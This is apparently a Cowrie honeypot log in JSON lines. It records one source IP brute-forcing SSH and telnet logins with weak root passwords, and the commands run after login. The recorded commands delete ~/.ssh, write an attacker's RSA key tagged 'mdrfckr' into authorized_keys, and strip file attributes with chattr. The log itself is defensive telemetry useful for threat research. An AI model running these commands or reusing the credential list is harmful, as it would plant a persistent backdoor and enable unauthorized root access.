{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:09:07.222059Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:09:07.477293Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:09:07.478347Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43198,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7f5e2ec086d","protocol":"ssh","message":"New connection: 212.227.235.229:43198 (1.2.3.4:22) [session: c7f5e2ec086d]","sensor":"my-vps","timestamp":"2025-08-26T19:09:07.721935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:09:07.728287Z","src_ip":"212.227.235.229","session":"c7f5e2ec086d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:09:07.977053Z","src_ip":"212.227.235.229","session":"c7f5e2ec086d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:09:08.976235Z","src_ip":"212.227.235.229","session":"c7f5e2ec086d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:09:10.230478Z","src_ip":"212.227.235.229","session":"c7f5e2ec086d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43728,"dst_ip":"1.2.3.4","dst_port":22,"session":"859dd6e80a65","protocol":"ssh","message":"New connection: 212.227.235.229:43728 (1.2.3.4:22) [session: 859dd6e80a65]","sensor":"my-vps","timestamp":"2025-08-26T19:09:10.473337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:09:10.474912Z","src_ip":"212.227.235.229","session":"859dd6e80a65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:09:10.727932Z","src_ip":"212.227.235.229","session":"859dd6e80a65"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:09:11.728793Z","src_ip":"212.227.235.229","session":"859dd6e80a65"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:09:11.976825Z","src_ip":"212.227.235.229","session":"859dd6e80a65"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:09:11.983393Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:09:12.295883Z","src_ip":"212.227.125.160","session":"f2d26b272d64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45153,"dst_ip":"1.2.3.4","dst_port":22,"session":"9eb83dadf20b","protocol":"ssh","message":"New connection: 212.227.235.229:45153 (1.2.3.4:22) [session: 9eb83dadf20b]","sensor":"my-vps","timestamp":"2025-08-26T19:09:18.435729Z"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:09:29.856408Z","src_ip":"212.227.235.229","session":"9eb83dadf20b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55148,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9f0a04fd938","protocol":"ssh","message":"New connection: 212.227.235.229:55148 (1.2.3.4:22) [session: c9f0a04fd938]","sensor":"my-vps","timestamp":"2025-08-26T19:10:12.660071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:10:12.668061Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:10:12.935398Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer!@#$1234","message":"login attempt [root/Qwer!@#$1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:10:14.011044Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:10:14.616811Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:10:14.617497Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:10:14.618548Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:10:14.891944Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:10:15.452358Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:10:15.453083Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:10:15.725064Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:10:15.725908Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55800,"dst_ip":"1.2.3.4","dst_port":22,"session":"b197dc2c33ef","protocol":"ssh","message":"New connection: 212.227.235.229:55800 (1.2.3.4:22) [session: b197dc2c33ef]","sensor":"my-vps","timestamp":"2025-08-26T19:10:15.978137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:10:15.980350Z","src_ip":"212.227.235.229","session":"b197dc2c33ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55538,"dst_ip":"1.2.3.4","dst_port":23,"session":"c542740b5714","protocol":"telnet","message":"New connection: 212.227.235.229:55538 (1.2.3.4:23) [session: c542740b5714]","sensor":"my-vps","timestamp":"2025-08-26T19:10:16.212964Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:10:16.247030Z","src_ip":"212.227.235.229","session":"b197dc2c33ef"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:10:17.285265Z","src_ip":"212.227.235.229","session":"b197dc2c33ef"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:10:18.548296Z","src_ip":"212.227.235.229","session":"b197dc2c33ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56407,"dst_ip":"1.2.3.4","dst_port":22,"session":"180200cf23b9","protocol":"ssh","message":"New connection: 212.227.235.229:56407 (1.2.3.4:22) [session: 180200cf23b9]","sensor":"my-vps","timestamp":"2025-08-26T19:10:18.791951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:10:18.799353Z","src_ip":"212.227.235.229","session":"180200cf23b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:10:19.045102Z","src_ip":"212.227.235.229","session":"180200cf23b9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:10:20.039223Z","src_ip":"212.227.235.229","session":"180200cf23b9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:10:20.323012Z","src_ip":"212.227.235.229","session":"180200cf23b9"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:10:20.330430Z","src_ip":"212.227.235.229","session":"c9f0a04fd938"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34114,"dst_ip":"1.2.3.4","dst_port":23,"session":"1953e027a1d1","protocol":"telnet","message":"New connection: 212.227.235.229:34114 (1.2.3.4:23) [session: 1953e027a1d1]","sensor":"my-vps","timestamp":"2025-08-26T19:10:38.480602Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45178,"dst_ip":"1.2.3.4","dst_port":22,"session":"66ec1a3cb0b7","protocol":"ssh","message":"New connection: 212.227.235.229:45178 (1.2.3.4:22) [session: 66ec1a3cb0b7]","sensor":"my-vps","timestamp":"2025-08-26T19:10:41.924144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:10:41.925258Z","src_ip":"212.227.235.229","session":"66ec1a3cb0b7"}
{"eventid":"cowrie.session.closed","duration":13.502190589904785,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:10:51.982728Z","src_ip":"212.227.235.229","session":"1953e027a1d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34363,"dst_ip":"1.2.3.4","dst_port":23,"session":"060f5d4bd549","protocol":"telnet","message":"New connection: 212.227.235.229:34363 (1.2.3.4:23) [session: 060f5d4bd549]","sensor":"my-vps","timestamp":"2025-08-26T19:10:52.267066Z"}
{"eventid":"cowrie.session.closed","duration":12.643609285354614,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:11:04.910603Z","src_ip":"212.227.235.229","session":"060f5d4bd549"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34588,"dst_ip":"1.2.3.4","dst_port":23,"session":"3fa5f6cd3410","protocol":"telnet","message":"New connection: 212.227.235.229:34588 (1.2.3.4:23) [session: 3fa5f6cd3410]","sensor":"my-vps","timestamp":"2025-08-26T19:11:05.154085Z"}
{"eventid":"cowrie.session.closed","duration":"24.0","message":"Connection lost after 24.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:11:05.949328Z","src_ip":"212.227.235.229","session":"66ec1a3cb0b7"}
{"eventid":"cowrie.session.closed","duration":12.773231506347656,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:11:17.927247Z","src_ip":"212.227.235.229","session":"3fa5f6cd3410"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34818,"dst_ip":"1.2.3.4","dst_port":23,"session":"d55eb9a6986f","protocol":"telnet","message":"New connection: 212.227.235.229:34818 (1.2.3.4:23) [session: d55eb9a6986f]","sensor":"my-vps","timestamp":"2025-08-26T19:11:18.177111Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:11:20.643195Z","src_ip":"212.227.235.229","session":"c542740b5714"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:11:20.667699Z","src_ip":"212.227.235.229","session":"c542740b5714"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39610,"dst_ip":"1.2.3.4","dst_port":22,"session":"f11b22b4c256","protocol":"ssh","message":"New connection: 212.227.235.229:39610 (1.2.3.4:22) [session: f11b22b4c256]","sensor":"my-vps","timestamp":"2025-08-26T19:11:21.947500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:11:21.953274Z","src_ip":"212.227.235.229","session":"f11b22b4c256"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:11:22.194745Z","src_ip":"212.227.235.229","session":"f11b22b4c256"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58729,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2bee80b8d60","protocol":"ssh","message":"New connection: 212.227.235.229:58729 (1.2.3.4:22) [session: b2bee80b8d60]","sensor":"my-vps","timestamp":"2025-08-26T19:11:23.141010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:11:23.141921Z","src_ip":"212.227.235.229","session":"b2bee80b8d60"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu2025","message":"login attempt [ubuntu/ubuntu2025] failed","sensor":"my-vps","timestamp":"2025-08-26T19:11:23.182384Z","src_ip":"212.227.235.229","session":"f11b22b4c256"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:11:24.431882Z","src_ip":"212.227.235.229","session":"f11b22b4c256"}
